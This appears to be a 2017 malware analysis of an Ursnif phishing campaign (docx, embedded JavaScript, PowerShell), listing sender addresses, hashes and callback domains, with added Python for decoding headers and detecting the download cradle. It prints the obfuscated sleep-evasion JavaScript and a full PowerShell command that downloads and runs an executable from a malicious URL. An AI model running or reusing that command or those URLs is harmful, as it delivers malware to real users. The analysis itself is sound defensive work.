c0d3inj3cT

Untitled

Sep 14th, 2017
Quick Analysis of Ongoing Ursnif campaign - 13th September 2017

Malware Delivery Method -> docx attachment in email

docx -> embedded JavaScript -> powershell -> downloads payload over HTTPS

Example:

Document sent as an attachment in the following email:

Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <maeda@admac.co.jp>
To: <erik@bajabushpilots.com>

Original attachment name: 原価請求書です277253.docx (translates to copy of Invoice)
MD5 hash: 85d09006634ab5f2138ac927997accda
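The Subject and From headers above are RFC 2047 encoded words (base64 over iso-2022-jp), so the lure text is unreadable as stored. The following is an added example, not part of the original paste: it decodes those two headers with the Python standard library. The header values are copied from the email above; the function names are my own. The decoded Subject contains 原価請求書, matching the attachment name.

```python
# Added example (not from the original paste): decode the RFC 2047 encoded-word
# headers quoted above so an analyst can read the lure text. Standard library only.
from email.header import decode_header, make_header

# Raw header values exactly as they appear in the phishing email above.
RAW_HEADERS = {
    "Subject": "=?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=",
    "From": "=?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <maeda@admac.co.jp>",
}


def decode_rfc2047(value: str) -> str:
    """Decode one RFC 2047 header value into a plain Unicode string.

    decode_header() splits the value into (bytes, charset) chunks, one per
    encoded word plus any unencoded text; make_header() decodes each chunk
    with its declared charset (iso-2022-jp here) and joins them.
    """
    return str(make_header(decode_header(value)))


def decode_headers(headers: dict) -> dict:
    """Decode every header in a {name: raw_value} mapping."""
    return {name: decode_rfc2047(value) for name, value in headers.items()}


if __name__ == "__main__":
    for name, decoded in decode_headers(RAW_HEADERS).items():
        print(f"{name}: {decoded}")
```

Decoding the display name as well as the subject is worth doing during triage: the From display name is where the spoofed identity is carried, while the angle-bracket address is what the mail server actually saw.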

Below are the unique sender email addresses observed in the Ursnif campaign that are sending the malicious documents as email attachments:

chris@lightsmith.com
erik@bajabushpilots.com
fpalacio@espublico.com

And below are the spoofed addresses:

kunio@jpntrust.co.jp
k-hayashiyama@hoxin-group.co.jp
maeda@admac.co.jp

Embedded JavaScript in the docx performs the following tasks:

// Detects Sleep Short Circuiting by checking the time difference between timestamps taken before and after the Sleep function is invoked.

piUCkfeTbuHWBQdaRl="getS"+"ec"+"onds";
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
WScript.Sleep(1000);
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();

If Sleep Short Circuiting is not detected, the JavaScript executes PowerShell to download the malicious payload over HTTPS, as shown below:

lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);
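The command line above has a recognisable shape for detection: a ping-to-localhost delay, a hidden PowerShell with the execution policy bypassed, a WebClient.DownloadFile fetch, a drop into %appdata%, and a Start-Process launch. The mixed case (cmd.eXE, sTarT-PROcess) is there to dodge naive string matching, so any rule has to match case-insensitively. What follows is an added example, not code from the original paste: a small Python triage function that scores process-creation command lines (Sysmon Event ID 1 / Windows 4688 style) against those traits. The log lines, URL and file names are constructed for the example and the indicator names are my own.

```python
# Added example (not from the original paste): flag the PowerShell download-cradle
# shape described above in process-creation command lines. Sample lines, the URL
# and the file names are constructed; the campaign's live URL is not used.
import re

# One regex per trait of the cradle quoted above. re.I is essential because the
# original mixes case (cmd.eXE, sTarT-PROcess, %appdAta%) to defeat plain matching.
CRADLE_INDICATORS = {
    "ping_delay":      re.compile(r"\bping\s+localhost\s*&", re.I),
    "policy_bypass":   re.compile(r"-executionpolicy\s+bypass", re.I),
    "no_profile":      re.compile(r"-noprofile\b", re.I),
    "hidden_window":   re.compile(r"-windowstyle\s+hidden", re.I),
    "webclient_fetch": re.compile(r"system\.net\.webclient\)\s*\.downloadfile\s*\(", re.I),
    "drop_to_appdata": re.compile(r"%appdata%[^'\"\s,)]*\.exe", re.I),
    "start_process":   re.compile(r"start-process\b", re.I),
}


def matched_indicators(cmdline: str) -> list:
    """Return the names of every cradle trait present in one command line."""
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(cmdline)]


def is_download_cradle(cmdline: str) -> bool:
    """Flag a line that fetches with WebClient and shows at least two further traits.

    -noprofile on its own is common in legitimate automation, so it is not
    counted towards the threshold; the WebClient fetch is mandatory.
    """
    hits = set(matched_indicators(cmdline))
    if "webclient_fetch" not in hits:
        return False
    return len(hits - {"webclient_fetch", "no_profile"}) >= 2


# Constructed Sysmon-style command lines. The first mirrors the shape of the
# cradle above with a placeholder URL and file name; the others are benign.
SAMPLE_COMMAND_LINES = [
    "cmd.eXE /c ping localhost & powershell.exe -executionpolicy bypass -noprofile "
    "-windowstyle hidden (new-object system.net.webclient).downloadfile("
    "'https://example.invalid/get.php?x','%appdata%sample.eXe'); "
    "sTarT-PROcess '%appdAta%sample.exe'",
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "cmd.exe /c ping localhost",
]


def triage(lines) -> list:
    """Return (command line, matched indicator names) for every flagged line."""
    return [(line, matched_indicators(line)) for line in lines if is_download_cradle(line)]


if __name__ == "__main__":
    for line, hits in triage(SAMPLE_COMMAND_LINES):
        print("FLAGGED:", ", ".join(hits))
        print("   ", line)
```

In a real deployment the same traits are more robust when paired with parent-process context (WINWORD.EXE spawning wscript/cscript or cmd), since that relationship is what the docx-to-JavaScript-to-PowerShell chain produces and is harder to vary than command-line spelling.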

MD5 hash of the downloaded payload: c0b7897f69f0a68297969c709cac576d

The downloaded payload performs the following network callback after execution:

antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg

Interesting callback domain name: antispam.city (how ironic) :D

Whois info shows that this domain was recently registered on 14th August 2017.